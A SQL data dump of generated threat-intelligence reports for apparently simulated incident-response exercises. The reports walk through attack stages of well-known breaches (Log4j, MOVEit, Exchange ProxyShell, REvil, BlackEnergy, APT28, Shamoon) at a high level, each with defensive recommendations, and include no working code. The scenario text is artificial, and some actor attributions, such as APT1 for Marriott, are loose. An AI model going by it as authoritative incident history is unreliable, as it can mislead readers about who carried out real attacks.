(290, 56, 577, 2, 'Initial Access Analysis', '## Analysis of Suspicious HTTP Request\nThe initial suspicious HTTP request detected was aimed at the Apache Struts framework. It appears to have exploited the CVE-2017-5638 vulnerability. This exploit allows remote attackers to execute arbitrary commands via a crafted Content-Type header. Further investigation is needed to confirm execution vectors leading to subsequent activities.', '2026-01-08 22:06:19'),
(291, 56, 578, 3, 'Execution Tactics Uncovered', '## Unusual Command Execution Observed\nFollowing the initial access, an unusual command was executed on the server. This command matches known patterns used to drop web shells, indicating a potential foothold has been established. Investigate server directories for anomalies in file modifications and check for unauthorized shell scripts.', '2026-01-08 22:06:19'),
(292, 56, 579, 4, 'Persistence Tactics Identified', '## Web Shell Detected in Server Directory\nA web shell has been detected on the server, placed in a directory accessible via HTTP requests. This suggests the attackers have established persistence, potentially allowing for remote command execution. Immediate containment is necessary to prevent further compromise.', '2026-01-08 22:06:19'),
(293, 56, 580, 5, 'Exfiltration Indicators', '## Unexpected Outbound Traffic Spike\nA significant spike in outbound traffic was observed, coinciding with the detection of the web shell. This traffic anomaly suggests potential data exfiltration. It is crucial to identify the data being accessed and determine the destination of the outbound traffic.', '2026-01-08 22:06:19'),
(294, 56, 581, 6, 'Lateral Movement Analysis', '## Unauthorized User Account Activity\nFollowing the exfiltration indicators, unauthorized activity was detected on multiple user accounts. This suggests attempts at lateral movement within the network. Review user account logs and network access patterns to identify the scope of compromise.', '2026-01-08 22:06:19'),
(295, 56, 582, 7, 'Reconnaissance Patterns Detected', '## Anomalous File Access Patterns\nAnomalous file access patterns have been detected, indicative of reconnaissance efforts. Files typically not accessed by routine processes are being queried, suggesting preparation for further exploitation. Conduct a thorough audit of access logs to identify unusual patterns.', '2026-01-08 22:06:19'),
(296, 56, 583, 8, 'Command and Control Channel Investigation', '## DNS Tunneling Suspected\nUnusual DNS queries have been observed, consistent with DNS tunneling techniques used for command and control communication. This covert channel allows attackers to bypass traditional security measures. Immediate action is needed to disrupt this communication chain.', '2026-01-08 22:06:19'),
(297, 56, 584, 9, 'Exfiltration Anomalies', '## Encrypted Traffic Anomaly\nAn anomaly in encrypted traffic was detected, potentially indicating advanced exfiltration methods. The use of non-standard encryption protocols points to sophisticated efforts to mask data transfer. Analyze traffic patterns and decryption attempts to ascertain data flow.', '2026-01-08 22:06:19'),
(298, 56, 585, 10, 'Privilege Escalation Attempts', '## Privileged Account Escalation Attempt\nAn attempt to escalate privileges on a compromised account has been detected. This attempt was thwarted, but it suggests a strategy to gain higher-level access within the network. Review all privileged accounts for signs of tampering or unauthorized access.', '2026-01-08 22:06:19'),
(299, 57, 586, 1, 'Post-Initial Access: Analyzing JNDI Payloads', '## Overview\nFollowing the detection of JNDI injection, further analysis is required to understand the payloads utilized by the attackers. These payloads often serve as the initial stage for further exploitation.\n\n## Key Findings\n- **Payload Variants:** Multiple JNDI payloads have been identified, indicating a sophisticated attack strategy.\n- **APT Attribution:** Evidence suggests the involvement of Chinese APT groups, leveraging customized payloads for deeper penetration.\n\n## Recommendations\n- **Immediate Patch Application:** Ensure all systems are updated with the latest security patches for Log4j vulnerabilities.\n- **Network Monitoring:** Increase monitoring of outbound connections to detect any unauthorized data flows.', '2026-01-08 22:09:13'),
(300, 57, 587, 2, 'Cryptominer Deployment: Identifying Malware Behavior', '## Overview\nThe deployment of cryptominers has been confirmed following the JNDI injection. This stage marks the transition from initial access to execution.\n\n## Key Findings\n- **Cryptominer Characteristics:** The malware is designed to utilize compromised systems for mining cryptocurrency, primarily focusing on Monero.\n- **Indicators of Compromise (IoCs):** Hash values and network traffic patterns associated with the cryptominer have been documented.\n\n## Recommendations\n- **System Resource Monitoring:** Watch for abnormal CPU usage, which may indicate cryptominer activity.\n- **Endpoint Detection and Response (EDR):** Deploy EDR solutions to detect and mitigate malware installations.', '2026-01-08 22:09:13'),
(301, 57, 588, 3, 'Backdoor Creation: Ensuring Persistence', '## Overview\nA backdoor has been identified, indicating the attackers\' intent to maintain long-term access to the compromised network.\n\n## Key Findings\n- **Backdoor Mechanisms:** The backdoor utilizes both known and custom methods to evade detection.\n- **Targeted Systems:** Persistence mechanisms have been established on critical infrastructure components.\n\n## Recommendations\n- **Comprehensive Threat Hunting:** Conduct thorough investigations to uncover hidden backdoors.\n- **Access Control Review:** Reassess access permissions and implement stricter access controls.', '2026-01-08 22:09:13'),
(302, 57, 589, 4, 'Lateral Movement: Expanding Network Foothold', '## Overview\nUnauthorized access has been detected, suggesting lateral movement within the network. This phase indicates an attempt to expand control and compromise additional systems.\n\n## Key Findings\n- **Techniques Used:** Attackers are leveraging stolen credentials and exploiting weak network segmentations.\n- **Potential Targets:** Systems holding sensitive data and high-value assets are at increased risk.\n\n## Recommendations\n- **Network Segmentation:** Strengthen network segmentation to limit lateral movements.\n- **User Behavior Analytics:** Implement solutions to detect anomalies in user behavior that may indicate credential misuse.', '2026-01-08 22:09:13'),
(303, 57, 590, 5, NULL, NULL, '2026-01-08 22:09:13'),
(304, 58, 591, 1, 'Insight into SQL Injection Vulnerability and Exploitation', '### Overview\nFollowing the initial alert on Cl0p\'s zero-day exploitation via SQL injection, it is crucial to understand the mechanisms and potential impacts of this attack vector.\n\n### SQL Injection Details\nSQL injection is a code injection technique that might destroy your database. It is one of the most common web hacking techniques. It can allow attackers to gain unauthorized access to sensitive data and even execute administrative operations on the database.\n\n### Potential Impacts\n- Unauthorized access to sensitive data.\n- Database corruption or deletion.\n- Network compromise and further exploitation.\n\n### Recommendations\n- Immediate patching of known vulnerabilities in the MOVEit system.\n- Enhanced monitoring of SQL queries and database access logs.', '2026-01-08 22:12:37'),
(305, 58, 592, 2, 'Automated Data Harvesting Scripts: A Deeper Look', '### Overview\nFollowing the execution of data harvesting scripts, it is important to analyze the methods and scripts used in this automated process.\n\n### Command and Scripting Interpreter: JavaScript (T1059.007)\nCl0p employs JavaScript-based scripts to automate the extraction and collection of data. These scripts can run with minimal detection and can be tailored to target specific datasets.\n\n### Key Characteristics\n- Scripts are designed to execute silently and efficiently.\n- They can be modified on-the-fly to avoid detection by security tools.\n- Typically exfiltrate data to external servers controlled by attackers.\n\n### Recommendations\n- Implement script execution monitoring.\n- Utilize behavioral analysis tools to identify unusual script activities.\n- Regularly update security policies to counter emerging threats.', '2026-01-08 22:12:37'),
(306, 58, 593, 3, 'Establishing Persistence: Techniques and Indicators', '### Overview\nPersistence mechanisms are crucial for attackers to maintain a foothold within compromised networks. Understanding these mechanisms can aid in detection and remediation.\n\n### Boot or Logon Autostart Execution (T1547)\nCl0p uses various techniques to ensure persistence, including modifying autostart entries and using scheduled tasks.\n\n### Indicators of Compromise\n- Unexpected changes in registry keys related to startup items.\n- New or modified scheduled tasks.\n- Unusual applications set to auto-start.\n\n### Recommendations\n- Conduct regular audits of startup and scheduled task configurations.\n- Implement endpoint detection and response (EDR) solutions to identify suspicious behavior.', '2026-01-08 22:12:37'),
(307, 58, 594, 4, 'Lateral Movement and Data Exfiltration: Strategies and Mitigation', '### Overview\nCl0p\'s lateral movement and data exfiltration strategies pose significant risks. Understanding these tactics can help in strengthening defenses.\n\n### Indicator Removal on Host (T1070)\nTo facilitate lateral movement, Cl0p employs techniques to hide their tracks by removing indicators of compromise.\n\n### Exfiltration Over C2 Channel (T1041)\nMass exfiltration is conducted over command and control (C2) channels, often using encrypted communication to avoid detection.\n\n### Mitigation Strategies\n- Deploy network segmentation to limit lateral movement.\n- Monitor for anomalous network traffic patterns.\n- Implement data loss prevention (DLP) solutions to detect and prevent unauthorized data transfers.', '2026-01-08 22:12:37'),
(308, 58, 595, 5, NULL, NULL, '2026-01-08 22:12:37'),
(309, 59, 596, 1, 'Initial Access Analysis', '## Overview\n\nFollowing the **Suspicious Access to Exchange Server** alert, further analysis was conducted to identify the initial access vector. It appears the adversary leveraged a known Exchange vulnerability, likely CVE-2021-34473, to gain unauthorized access.\n\n## Technical Details\n- **IP Address**: 192.168.1.10\n- **User Agent**: Suspicious pattern indicating automated tool usage\n- **Vulnerability Exploited**: CVE-2021-34473\n\n## Recommendations\n- Patch vulnerable Exchange servers immediately.\n- Implement network segmentation to limit access to critical assets.\n\n## Next Steps\nPrepare for potential web shell deployment as adversaries often use this method for further exploitation post-initial access.', '2026-01-08 22:15:20'),
(310, 59, 597, 2, 'Web Shell Deployment Insights', '## Overview\n\nPost detection of **Web Shell Deployment**, an investigation revealed the presence of multiple malicious web shells on the Exchange server.\n\n## Indicators of Compromise\n- **File Path**: `/owa/auth/xyz.aspx`\n- **File Size**: 3kb\n- **Behavior**: Command execution via PowerShell\n\n## Recommendations\n- Conduct a thorough scan for additional web shells.\n- Isolate the affected server to prevent further compromise.\n\n## Next Steps\nMonitor for privilege escalation attempts, particularly those exploiting CVE-2021-34523.', '2026-01-08 22:15:20'),
(311, 59, 598, 3, 'Privilege Escalation Attempt Detected', '## Overview\n\nThe adversary has exploited **CVE-2021-34523** for privilege escalation, gaining SYSTEM-level access on the compromised Exchange server.\n\n## Technical Details\n- **Exploit Tool Used**: PrivEsc v2.0\n- **Privileges Gained**: SYSTEM\n\n## Recommendations\n- Review and restrict service account permissions.\n- Enhance monitoring on privileged account activities.\n\n## Next Steps\nAnticipate lateral movement attempts as adversaries seek to expand their foothold within the network.', '2026-01-08 22:15:20'),
(312, 59, 599, 4, 'Lateral Movement Strategy', '## Overview\n\nLateral movement activities have been identified, indicating the adversary\'s intent to expand their presence within the network.\n\n## Observed Tactics\n- **Technique**: Pass-the-Hash\n- **Targeted Systems**: File servers and domain controllers\n\n## Recommendations\n- Implement SMB signing and limit NTLM use.\n- Monitor network traffic for anomalous patterns.\n\n## Next Steps\nPrepare for potential data exfiltration efforts, focusing on monitoring unusual data transfer channels.', '2026-01-08 22:15:20'),
(313, 59, 600, 5, NULL, NULL, '2026-01-08 22:15:20'),
(314, 60, 771, 1, 'Analysis of Initial Access via Phishing Email', '## Context\nFollowing Alert 1, the phishing email campaign targeting JBS Foods was identified as the initial entry point for the REvil ransomware attack. This report provides a detailed analysis of the social engineering tactics employed and the potential vulnerabilities exploited.\n\n## Phishing Email Characteristics\n- **Subject Line**: Mimicked internal communications.\n- **Sender**: Spoofed email addresses resembling trusted partners.\n- **Content**: Included links to a compromised website hosting malicious payloads.\n\n## Vulnerabilities\n- **End-User Awareness**: Lack of effective phishing awareness among employees.\n- **Email Filtering**: Insufficient filtering and detection mechanisms.\n\n## Recommendations\n- **Training**: Enhance security training focused on phishing threats.\n- **Technical Measures**: Implement advanced email filtering solutions.\n\nThis analysis sets the stage for understanding how the ransomware was successfully deployed after gaining initial access.', '2026-01-11 23:33:15'),
(315, 60, 772, 2, 'Insights into Ransomware Deployment and Execution', '## Overview\nAfter gaining initial access through phishing, the threat actors moved to deploy and execute the REvil ransomware. This report delves into the methods used for malware deployment and subsequent execution.\n\n## Deployment Tactics\n- **Lateral Movement**: Exploited internal network vulnerabilities to propagate.\n- **Privilege Escalation**: Used stolen credentials to gain administrative access.\n\n## Execution Details\n- **Payload Delivery**: The ransomware was delivered via script execution on compromised systems.\n- **Encryption Process**: Files were encrypted using strong encryption algorithms, making recovery without payment challenging.\n\n## Mitigation Strategies\n- **Network Segmentation**: Implement robust segmentation to contain threats.\n- **Access Controls**: Regularly update and audit user access rights.\n\nUnderstanding these techniques is crucial for tracing the Bitcoin ransom payments and analyzing financial transactions, as detailed in the subsequent alert.', '2026-01-11 23:33:15'),
(316, 60, 773, 3, NULL, NULL, '2026-01-11 23:33:15'),
(317, 61, 774, 1, 'Phishing Attack Analysis and Implications', '# Phishing Attack Analysis and Implications\n\n## Overview\nThe initial compromise of JBS Foods\' network was executed through a sophisticated phishing attack. This report provides an in-depth analysis of the phishing techniques employed and the potential vulnerabilities that were exploited.\n\n## Key Findings\n- **Attack Vector:** The attackers used spear-phishing emails targeting specific employees with access to critical systems.\n- **Email Content:** The phishing emails contained malicious links disguised as legitimate vendor communication. These links redirected to a cloned login page to harvest credentials.\n- **Exploited Vulnerabilities:** The lack of multi-factor authentication (MFA) and insufficient email filtering allowed the phishing emails to bypass security measures.\n\n## Implications\nUnderstanding this initial compromise is crucial for preparing a defense against the deployment of ransomware, the next stage in the attack chain.', '2026-01-11 23:35:35'),
(318, 61, 775, 2, 'Ransomware Deployment and System Impact', '# Ransomware Deployment and System Impact\n\n## Overview\nFollowing the successful phishing attack, REvil deployed ransomware across JBS Foods\' network. This report details the deployment strategy and its immediate impact on operations.\n\n## Deployment Strategy\n- **Malware Delivery:** Utilizing the harvested credentials, attackers executed the ransomware payload on compromised systems.\n- **Immediate Effects:** Critical systems were encrypted, causing significant disruption to JBS Foods\' supply chain and operations.\n\n## System Impact\n- **Operational Disruption:** Production and distribution were severely impacted, with losses estimated in millions.\n- **Response Measures:** Immediate incident response involved isolating affected systems and initiating backup restoration protocols.\n\nUnderstanding this stage is essential for anticipating the mechanisms attackers may use to establish persistence within the network.', '2026-01-11 23:35:35'),
(319, 61, 776, 3, 'Persistence Mechanisms and Threat Intelligence', '# Persistence Mechanisms and Threat Intelligence\n\n## Overview\nAfter deploying ransomware, attackers focused on establishing persistence within JBS Foods\' network to maintain control and facilitate further operations.\n\n## Persistence Tactics\n- **Backdoor Installation:** Attackers installed backdoors on key systems, enabling remote access even after initial detection.\n- **Credential Dumping:** Tools were used to extract additional credentials, allowing deeper penetration into the network.\n\n## Threat Intelligence\n- **Indicators of Compromise (IOCs):** Monitoring for known IOCs is vital for detecting ongoing attacker activity.\n- **Advanced Threat Detection:** Utilizing behavioral analytics to identify unusual network traffic patterns indicative of lateral movement.\n\nThis report highlights the importance of understanding persistence tactics to counteract the lateral movement toward critical systems.', '2026-01-11 23:35:35');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(320, 61, 777, 4, 'Lateral Movement and Financial Transaction Analysis', '# Lateral Movement and Financial Transaction Analysis\n\n## Overview\nThe attackers\' lateral movement within JBS Foods\' network aimed to access critical systems and data essential for demanding ransom. This phase sets the stage for financial transaction analysis related to ransom payment.\n\n## Lateral Movement Techniques\n- **Network Propagation:** Attackers used compromised credentials to move laterally, accessing and encrypting additional systems.\n- **Privilege Escalation:** Escalating privileges allowed comprehensive access to sensitive infrastructure.\n\n## Financial Transaction Analysis\n- **Ransom Demand:** A significant ransom was demanded in Bitcoin, with attackers providing a deadline for payment.\n- **Fund Tracing:** The FBI and cybersecurity teams initiated tracking of Bitcoin transactions to identify recipient wallets and potential recovery opportunities.\n\nUnderstanding this stage is crucial for tracing the ransom payment and analyzing the effectiveness of FBI\'s fund recovery efforts.', '2026-01-11 23:35:35'),
(321, 61, 778, 5, NULL, NULL, '2026-01-11 23:35:35'),
(322, 62, 779, 1, 'Unveiling the Entry Point: Phishing Tactics Analysis', '### Contextual Overview\nFollowing the reported phishing attack, analysis of the phishing emails reveals the use of sophisticated social engineering tactics. The emails were crafted to appear as legitimate communications from known suppliers and partners of the Ukrainian power companies.\n\n### Technical Insight\nUpon inspection, the attachments contained malicious macros that, when executed, dropped the BlackEnergy malware into the network, initiating the breach.\n\n### Recommendations\n- **Training**: Enhance employee training on identifying phishing attempts.\n- **Filtering**: Strengthen email filtering mechanisms to detect and quarantine suspicious emails.\n\n### Next Steps\nFocus shifts to analyzing the execution phase of BlackEnergy malware, understanding its delivery and initial actions within the compromised environment.', '2026-01-11 23:37:37'),
(323, 62, 780, 2, 'Dissecting BlackEnergy: Malware Execution Analysis', '### Contextual Overview\nThe execution of BlackEnergy malware marks a critical escalation in the attack timeline. The malware was activated through malicious macros embedded in the phishing email attachments.\n\n### Technical Insight\nBlackEnergy, once executed, established a foothold by creating a command and control (C2) channel to external servers, enabling remote attackers to deploy additional payloads and instructions.\n\n### Indicators of Compromise\n- Outbound connections to known C2 IP addresses.\n- Presence of BlackEnergy-specific registry entries and files within the system.\n\n### Next Steps\nInvestigate the methods used for credential dumping that allowed the attackers to maintain persistence in the network.', '2026-01-11 23:37:37'),
(324, 62, 781, 3, 'Credential Dumping: Persistence Mechanisms in Play', '### Contextual Overview\nFollowing the execution of BlackEnergy, attackers moved swiftly to dump credentials, a critical step in maintaining persistence within the network.\n\n### Technical Insight\nTools such as Mimikatz were likely leveraged to extract credential information from memory and the local security authority subsystem service (LSASS). This enabled attackers to reuse credentials for further network infiltration.\n\n### Defensive Measures\n- **Monitoring**: Implement continuous monitoring for unusual authentication activities.\n- **Patch Management**: Ensure systems are updated to mitigate known vulnerabilities exploited by credential dumping tools.\n\n### Next Steps\nTransition to analyzing lateral movement techniques employed to infiltrate SCADA systems.', '2026-01-11 23:37:37'),
(325, 62, 782, 4, 'Lateral Movement: Targeting SCADA Systems', '### Contextual Overview\nWith valid credentials, attackers executed lateral movement strategies to access critical SCADA systems, key components in the power grid infrastructure.\n\n### Technical Insight\nAttackers mapped the network using tools like PsExec and leveraged remote desktop services to gain access to SCADA systems. This movement was facilitated by stolen credentials and undetected due to legitimate-looking access patterns.\n\n### Mitigation Strategies\n- **Network Segmentation**: Implement strict network segmentation to isolate critical infrastructure components.\n- **Access Controls**: Enforce the principle of least privilege and implement robust access controls.\n\n### Next Steps\nPrepare for potential destructive actions, including the deployment of the KillDisk wiper, to understand its impact and recovery strategies.', '2026-01-11 23:37:37'),
(326, 62, 783, 5, NULL, NULL, '2026-01-11 23:37:37'),
(327, 63, 784, 1, 'Analysis of Phishing Campaign Tactics', '### Overview\nFollowing the detection of the phishing campaign attributed to Deep Panda, further analysis reveals advanced social engineering tactics targeting Anthem employees. The campaign utilized convincingly crafted emails impersonating internal IT support.\n\n### Key Details\n- **Emails Origin**: The emails were traced back to a known malicious IP address associated with previous Deep Panda activities.\n- **Payload Delivery**: Once the link in the phishing email was clicked, it redirected users to a fake login page capturing credentials.\n\n### Next Steps\nUnderstanding the delivery mechanism provides context for the subsequent event: the suspicious execution of \'Derusbi\' malware, which leveraged compromised credentials for initial access.', '2026-01-11 23:42:29'),
(328, 63, 785, 2, 'Derusbi Malware Execution Insights', '### Overview\nPost-phishing campaign, the compromised credentials facilitated the execution of \'Derusbi\' malware, a sophisticated tool used by Deep Panda for data theft and espionage.\n\n### Key Details\n- **Malware Functionality**: \'Derusbi\' is known for its ability to hide its presence and adapt to infected environments.\n- **Command and Control (C2)**: Communication established with external servers to receive further instructions.\n\n### Next Steps\nThe focus shifts to identifying the persistence mechanisms implemented by the malware, providing insight into their strategy to maintain long-term access to Anthem’s systems.', '2026-01-11 23:42:29'),
(329, 63, 786, 3, 'Persistence Mechanisms Employed by Deep Panda', '### Overview\nDeep Panda employs sophisticated persistence methods to ensure prolonged access to compromised systems.\n\n### Key Details\n- **Registry Modifications**: Alterations in system registry to rerun malicious processes upon startup.\n- **Service Creation**: New services created to maintain the malware\'s presence covertly.\n\n### Next Steps\nAnalyzing persistence provides a foundation for tracing lateral movement within Anthem’s network, indicating how Deep Panda expanded their footprint internally.', '2026-01-11 23:42:29'),
(330, 63, 787, 4, 'Tracing Lateral Movement: Deep Panda\'s Internal Reconnaissance', '### Overview\nDeep Panda\'s strategy involves extensive lateral movement to gather intelligence and identify valuable data within Anthem’s infrastructure.\n\n### Key Details\n- **Credential Dumping**: Use of tools to harvest additional credentials, escalating privileges.\n- **Network Mapping**: Identification of key servers and databases holding sensitive information.\n\n### Next Steps\nMonitoring these activities leads directly to detecting data exfiltration attempts, marking the final stage of the breach.', '2026-01-11 23:42:29'),
(331, 63, 788, 5, NULL, NULL, '2026-01-11 23:42:29'),
(332, 64, 789, 1, 'Analysis of Initial Access via Spear Phishing Campaign', '## Context After Alert 1: Initial Access via Spear Phishing\n\n### Overview\nAfter the successful spear phishing campaign that granted initial access, it appears that the adversaries behind the OPM breach have strategically tailored their phishing emails to exploit vulnerabilities within the federal network\'s email systems. The utilization of deceptive email headers and sophisticated social engineering tactics suggests a high level of reconnaissance.\n\n### Insights\n- **Targeted Individuals:** The phishing emails were directed towards personnel with administrative privileges and access to HR databases, highlighting the adversaries\' objective to penetrate systems that hold sensitive personnel data.\n- **Phishing Techniques:** Analysis of the phishing emails revealed an advanced use of domain spoofing and malicious attachments disguised as internal documents.\n\n### Implications for Next Steps\nThe successful initial access suggests a potential for deeper network infiltration. The next phase may involve malware execution to establish persistent control over the network, likely using a Remote Access Tool (RAT) such as PlugX.\n', '2026-01-11 23:44:22'),
(333, 64, 790, 2, 'Deployment and Execution of PlugX RAT', '## Context After Alert 2: Execution of PlugX RAT for Network Control\n\n### Overview\nFollowing the initial compromise, the adversaries deployed the PlugX RAT to maintain persistent access and control over the compromised network. PlugX, known for its stealth and versatility, allows attackers to execute commands, manage files, and exfiltrate data without detection.\n\n### Technical Details\n- **Installation Vectors:** The RAT was introduced through a disguised executable masquerading as a legitimate government application.\n- **Capabilities:** PlugX enables remote command execution, file manipulation, and data exfiltration, all while evading traditional security mechanisms.\n\n### Implications for Next Steps\nThe presence of PlugX indicates the adversaries are likely in the process of identifying and extracting sensitive personnel data. Attention must be directed towards monitoring network traffic for unusual patterns and securing data repositories to prevent exfiltration.\n', '2026-01-11 23:44:22'),
(334, 64, 791, 3, NULL, NULL, '2026-01-11 23:44:22'),
(335, 65, 792, 1, 'APT1\'s Spear Phishing Campaign: Entry Point Analysis', '### Overview\nFollowing the spear phishing campaign targeting Marriott employees, initial access was successfully established. This targeted approach focused on social engineering tactics, exploiting human vulnerabilities.\n\n### Key Findings\n- **Phishing Techniques**: The campaign utilized highly personalized emails, often mimicking internal communications.\n- **Malicious Attachments**: Attachments were disguised as routine documents but contained malicious macros.\n- **Compromised Accounts**: Several user accounts were compromised, providing the attackers with initial footholds.\n\n### Next Steps\nThe next phase likely involves the deployment of malicious software to establish deeper network infiltration. Monitoring for unusual software execution is recommended.', '2026-01-12 22:14:44'),
(336, 65, 793, 2, 'Remote Access Trojan Deployment: APT1\'s Next Move', '### Overview\nFollowing the initial phishing success, APT1 deployed a sophisticated Remote Access Trojan (RAT) to execute commands and maintain control over compromised systems.\n\n### Key Findings\n- **RAT Characteristics**: The RAT employed is capable of evading detection, utilizing encryption to mask its activities.\n- **Command and Control (C2)**: Communication with external command servers was established, indicating preparation for sustained network presence.\n- **Execution Pathways**: The malware was executed via compromised user credentials, minimizing detection risk.\n\n### Next Steps\nInvestigate persistence mechanisms to understand how APT1 maintains long-term access and control over compromised systems.', '2026-01-12 22:14:44'),
(337, 65, 794, 3, 'Persistence Mechanism: Ensuring APT1\'s Long-Term Access', '### Overview\nAPT1 has implemented sophisticated persistence mechanisms to maintain control over Marriott\'s network, even post-acquisition.\n\n### Key Findings\n- **Registry Modifications**: Alterations in system registries ensure the RAT reinitializes upon system reboot.\n- **Scheduled Tasks**: New tasks have been created to periodically execute the RAT, ensuring continued presence.\n- **Credential Dumping**: Harvested credentials are used to re-establish access if initial footholds are compromised.\n\n### Next Steps\nAPT1\'s strategy will likely involve lateral movement, exploiting network trust to expand their infiltration scope.', '2026-01-12 22:14:44'),
(338, 65, 795, 4, 'Lateral Movement: APT1 Exploits Network Trust', '### Overview\nAPT1 has begun exploiting network trust relationships within Marriott\'s infrastructure to facilitate lateral movement.\n\n### Key Findings\n- **Pass-the-Hash Attacks**: Reusing stolen NTLM password hashes to authenticate to other systems without ever needing the plaintext passwords.\n- **Network Mapping**: Detailed reconnaissance has been performed to identify high-value targets within the network.\n- **Privilege Escalation**: Techniques used to escalate privileges and gain access to sensitive data stores.\n\n### Next Steps\nThe final phase involves data exfiltration, likely utilizing encrypted channels to transfer stolen data without detection.', '2026-01-12 22:14:44'),
(339, 65, 796, 5, NULL, NULL, '2026-01-12 22:14:44'),
(340, 66, 797, 1, NULL, NULL, '2026-01-12 22:16:51'),
(341, 66, 798, 2, 'Execution of X-Agent Implant', '### Summary\nFollowing the detection of the spear-phishing campaign, it has been confirmed that the APT28 group successfully executed the X-Agent implant on compromised systems. \n\n### Details\n- **Implant Functionality**: X-Agent is a modular backdoor capable of keystroke logging, file extraction, and remote access.\n- **Execution Method**: The implant was delivered as a payload within the spear-phishing campaign, likely disguised as a legitimate document.\n\n### Recommendations\n- Verify the integrity of files and monitor for unusual process activity.\n- Implement stricter email filtering and employee training on recognizing phishing attempts.', '2026-01-12 22:16:51'),
(342, 66, 799, 3, 'Establishment of X-Tunnel Backdoor', '### Summary\nPost-execution of the X-Agent implant, APT28 has established a persistent backdoor using X-Tunnel.\n\n### Details\n- **Backdoor Capabilities**: X-Tunnel enables encrypted communications, facilitating data exfiltration and further control over the network.\n- **Persistence Mechanism**: X-Tunnel is configured to start automatically, allowing continued access even after system reboots.\n\n### Recommendations\n- Analyze network traffic for anomalous encrypted connections.\n- Consider network segmentation to limit lateral movement.', '2026-01-12 22:16:51'),
(343, 66, 800, 4, 'Credential Dump for Lateral Movement', '### Summary\nAPT28 is leveraging stolen credentials to move laterally within the network.\n\n### Details\n- **Credential Harvesting**: Credentials were harvested from compromised machines via the X-Agent implant.\n- **Lateral Movement Tactics**: Techniques include Pass-the-Hash and Pass-the-Ticket to access additional systems.\n\n### Recommendations\n- Reset compromised credentials and enforce multi-factor authentication. Because Pass-the-Ticket is in play, note that a password reset does not invalidate Kerberos tickets that were already issued; if domain-level ticket abuse is confirmed, also reset the krbtgt account (twice, allowing replication between resets) so forged or stolen tickets stop validating.\n- Regularly audit user access rights and monitor for unauthorized access attempts.', '2026-01-12 22:16:51'),
(344, 66, 801, 5, 'Data Exfiltration to External Servers', '### Summary\nAPT28 has initiated data exfiltration activities, transferring sensitive information to external servers.\n\n### Details\n- **Exfiltration Channels**: Data is being exfiltrated using the X-Tunnel backdoor, employing encrypted communications.\n- **Targeted Data**: Emails, documents, and other sensitive files are the primary targets.\n\n### Recommendations\n- Implement data loss prevention (DLP) solutions to detect and block unauthorized data transfers.\n- Conduct a comprehensive data breach impact assessment and notify affected parties as required.', '2026-01-12 22:16:51'),
(345, 67, 802, 1, 'Analysis of Unusual RDP Logins', '### Contextual Overview\nFollowing the alert of **Unusual RDP Logins Detected**, initial investigations have revealed potential lateral movement attempts by APT33 operatives. The unauthorized logins appear to originate from IP addresses previously associated with APT33 infrastructure. \n\n### Next Steps\nIn response to these logins, analysts should prepare for the possibility of **Payload Execution**. It is crucial to monitor for any signs of script or binary execution that may indicate the deployment of a malicious payload. \n\n### Recommendations\n- Conduct a thorough review of RDP logs for any anomalies.\n- Enhance monitoring of systems for unexpected processes or script executions.', '2026-01-12 22:17:37'),
(346, 67, 803, 2, 'Execution of Malicious Payload', '### Incident Detail\nThe alert for **Execution of Malicious Payload** has been triggered, indicating that APT33 has successfully deployed a harmful software component. The payload is believed to contain components designed for registry modification and service creation. \n\n### Insights\nThis stage is critical as it establishes persistence within the network. Security teams should investigate to determine if any unauthorized registry changes or new services have been created. This will help in identifying the extent of the breach.\n\n### Next Steps\nPrepare for **Registry Modification and Service Creation**. Focus should be on detecting and reversing any unauthorized changes to maintain system integrity.\n\n### Recommendations\n- Utilize registry monitoring tools to detect modifications.\n- Implement alerts for the creation of new services.', '2026-01-12 22:17:37'),
(347, 67, 804, 3, 'Registry Modification and Service Creation Analysis', '### Current Situation\nFollowing the execution of the malicious payload, **Registry Modification and Service Creation** have been detected. These actions are designed to ensure the persistence of the threat actor within the network.\n\n### Deeper Insight\nAPT33 employs these techniques to maintain access across system reboots and disruptions. The modifications align with known tactics of service creation using Windows Management Instrumentation (WMI).\n\n### Next Steps\nPrepare for an increase in **Network Traffic and SMB Activity**, as the adversaries may begin to move laterally through the network. Monitoring network traffic patterns and SMB connections will be crucial.\n\n### Recommendations\n- Deploy network anomaly detection systems.\n- Harden SMB configurations and monitor for unusual activity.', '2026-01-12 22:17:37'),
(348, 67, 805, 4, 'Increased Network Traffic and SMB Activity', '### Overview\nThe alert for **Increased Network Traffic and SMB Activity** signifies that APT33 is actively moving laterally within the network. This stage often precedes destructive actions.\n\n### Analysis\nThe increase in SMB connections most likely reflects the attackers copying additional payloads to other hosts or staging collected data internally; SMB is rarely the external exfiltration channel itself, so pair this alert with a review of outbound traffic rather than treating it as exfiltration evidence on its own. This activity aligns with previous APT33 operations where lateral movement was a precursor to destructive attacks.\n\n### Next Steps\nPrepare for the potential **MBR Overwrite Detected**, a hallmark of the Shamoon attack. This destructive phase involves overwriting the Master Boot Record to render systems inoperable.\n\n### Recommendations\n- Isolate affected segments to prevent further lateral movement.\n- Initiate backup and recovery plans in anticipation of potential data destruction, and verify that backups are offline or otherwise unreachable over SMB so a wiper cannot destroy them as well.', '2026-01-12 22:17:37'),
(349, 67, 806, 5, NULL, NULL, '2026-01-12 22:17:37'),
(350, 68, 807, 1, 'Analysis of Initial Access Vector', '### Overview\nThe suspicious login attempt detected indicates a potential compromise of credentials or exploitation of a vulnerability in the authentication system.\n\n### Context\n- **Origin IP:** Traced to a known proxy service often used by attackers.\n- **Target:** Administrative account with elevated privileges.\n\n### Next Steps\nPrepare for potential malware execution, as this is a common progression following unauthorized access.\n\n### Recommendations\n- Immediate password reset for affected accounts.\n- Implement multi-factor authentication (MFA) for all sensitive access points.', '2026-01-12 22:20:16'),
(351, 68, 808, 2, 'Malware Execution and Initial Impact', '### Overview\nMalware has been executed on the compromised system, confirming unauthorized access intent.\n\n### Context\n- **Type:** Custom malware linked to Cobalt Group\'s known toolkit.\n- **Functionality:** Initial reconnaissance and data collection.\n\n### Implications\nThe malware may attempt persistence mechanisms; observe for backdoor installation attempts.\n\n### Recommendations\n- Quarantine affected systems.\n- Begin forensic image capture for further analysis.', '2026-01-12 22:20:16'),
